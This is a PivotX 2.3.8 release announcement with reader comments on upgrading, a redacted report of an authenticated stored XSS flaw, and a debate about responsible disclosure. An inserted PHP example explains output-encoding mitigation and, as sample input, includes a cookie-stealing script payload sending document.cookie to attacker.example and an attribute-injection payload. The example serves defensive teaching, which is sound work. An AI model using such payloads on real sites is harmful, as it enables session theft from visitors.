PivotX 2.3.8 released.

We've just released a new maintenance update for PivotX. This is a recommended upgrade for all PivotX 2.x websites. For earlier security-related issues and patches, see the page dedicated to Security issues.

These are the changes since PivotX 2.3.7:

  • Fixed a bug where archive_list, when used more than once with different types, output the wrong number of links
  • New params for archive_list:
    • amount (to limit the amount of output)
    • start and end (specify a range so you can combine different types of output)
    • year (to restrict the output to a single year)
  • Mobile theme updated
  • Added PivotX icon for not-found images.
  • Added PHP 5.5 compatibility fix.
  • Added Smarty security fix.
  • Minor update to mobile dashboard.
  • Fixed problem with more than 1 uploader in the editor.
  • Added delHook function.
  • Added file existence check before creating thumbnail to circumvent lots of unrelated warnings.
  • Introducing hidden setting 'email_start_text' to replace default text in notification mails.

The PivotX 2.3.8 release can be downloaded from this location: pivotx.net/files/pivotx_latest.zip (or pivotx.net/files/pivotx_latest.tgz, if you prefer .tgz files). For setup instructions, we point you to our documentation: Getting the files & installing. If you're having trouble downloading the files, you can also download them from our sourceforge mirror.

Posted by Bob den Otter, Wednesday 22 January 2014

thirteen comments

Thank you!

Oleg (URL) - 23-01-’14 10:04

Would it be safe to update from v2.3.6 right to v2.3.8, or should we update to v2.3.7 in between?

The Doctor (URL) - 05-02-’14 03:58

It’s completely safe to skip 2.3.7 and go directly to 2.3.8.

Hans "hansfn" Nordhaug (Email) - 05-02-’14 08:33

Hi, I’ve just taken over as admin on a site and it’s on version 2.2.6. Can I upgrade straight to the new version, or do I need to do it in steps?

Zozinderingler - 07-02-’14 15:58

As far as I can see, it should be completely fine to upgrade directly. (You should update ASAP since there are security issues with version 2.2.6.) Always back-up before upgrading ;-)

Hans "hansfn" Nordhaug (Email) - 07-02-’14 17:59

You have an authenticated persistent XSS vuln in 2.3.8 where you can [details removed]. Seeing as how you have to be authenticated it doesn’t pose such a big security risk, but there could be some who are given access with normal user privileges who can still do this. It still shouldn’t allow javascript to be used for [details removed]. I hope to see it fixed. -Anon

AnonFreeworld - 01-03-’14 09:23
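The report above describes an authenticated stored (persistent) XSS, with the vector redacted by the maintainer. As an added example that is not PivotX's own code and not the actual fix shipped in 2.3.9, this shows the standard mitigation for that bug class in PHP: store what the user submitted as-is, but encode it for the HTML context at render time, so a low-privilege author cannot get script into pages viewed by others. The field name, the sample comment text and the helper names are constructed for the example.

```php
<?php
// Added example (not PivotX code): output encoding as the fix for stored XSS.
// The bug class: user-supplied text saved by an authenticated, low-privilege
// account is later echoed into HTML unchanged, so <script> or event-handler
// attributes in it run in every visitor's browser.

// Encode a value for the HTML body or a double-quoted attribute.
// ENT_QUOTES also encodes single quotes; ENT_SUBSTITUTE keeps invalid UTF-8
// from turning the whole string into "" (which would silently drop content).
function escape_html($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render a comment the unsafe way: raw interpolation into the template.
function render_comment_vulnerable($author, $body) {
    return "<div class=\"comment\" data-author=\"{$author}\"><p>{$body}</p></div>";
}

// Render the same comment with every user-controlled value encoded.
function render_comment_hardened($author, $body) {
    return '<div class="comment" data-author="' . escape_html($author) . '"><p>'
         . escape_html($body) . '</p></div>';
}

// Constructed sample input: what a normal-privilege user might save in a
// comment or entry field. Both the body and the attribute value carry payloads.
$author = 'mallory" onmouseover="alert(1)';
$body   = 'Nice post! <script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo "Vulnerable output:\n", render_comment_vulnerable($author, $body), "\n\n";
echo "Hardened output:\n",   render_comment_hardened($author, $body),   "\n";
```

In the hardened output the angle brackets and quotes arrive in the page as `&lt;`, `&gt;` and `&quot;`, so the browser displays the text instead of executing it, and the stored value itself never has to change. Encoding at render time is what makes the fix complete: sanitising on input leaves every other output path (feeds, dashboards, notification mails) exposed, and the context-specific escape must be repeated wherever the value is printed.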

Thx for the report, but this is not the way to report security issues. We have a dedicated security page that is linked to from the main menu of pivotx.net explaining where to report it. I have edited your comment slightly to not reveal to much detail to the public. I’ll fix the issue shortly.

Hans "hansfn" Nordhaug (Email) - 01-03-’14 17:49

My apologies, will use the security page if any further issues are found next time. Just in a rush.

AnonFreeworld - 01-03-’14 20:00

By redacting that information, you’ve also made it harder for us to write signatures to detect and block this attack so we don’t know what to look for if someone tries to use it. Attackers already know about it and can start using it, while the rest of us don’t know what to look out for. That pushes the balance of power farther away from the defenders by limiting actionable intel.

The Doctor (URL) - 02-03-’14 03:01

Hi, Doctor. Did we two have this same discussion when the terrible reset password bug was discovered or was that another PivotX user? Anyway, I still think responsible disclosure is the way to go. It means giving us at least a couple of days to create a patch/new release, before going public with the attack vector.

Hans "hansfn" Nordhaug (Email) - 02-03-’14 14:41

We did, yes.

I’m all for responsible disclosure, but I’m also in favor of having something to go on that I can tell my clients and customers that they can use in the interim period between finding out and having an official patch. “There’s this bug and people are exploiting it, but I don’t have any details for you,” does not make for clients sleeping well. Nor does it make things easy for the network security projects who want to jump on building a countermeasure for this, only to find that they have nothing to go on.

The Doctor (URL) - 02-03-’14 18:38

OK, so we still disagree on how much information one should provide before the patches are available. I just don’t understand how you can have responsible disclosure and at the same time provide enough information (to the public) so network security projects can build a countermeasure. Do you have an example from other (big) projects that act like you expect? I’m just curious.

Anyway, the official patches are committed to SVN and the 2.3.9 release is coming tomorrow. I don’t think the issues warrant a blog post already tonight, but I guess you disagree ;-)

Hans "hansfn" Nordhaug (Email) - 02-03-’14 22:28

Microsoft Server 2008’s DNS server.

Apple’s recent SSL screwup – we had enough information to not only get sigs in place but brief clients as well as the in-house userbase on what to watch out for and what the risks were. That kept a close call from being a compromise, in one case.

The remote code execution exploit in Mediawiki’s PDF handler.

The Doctor (URL) - 03-03-’14 04:52

For support questions please visit the PivotX forum.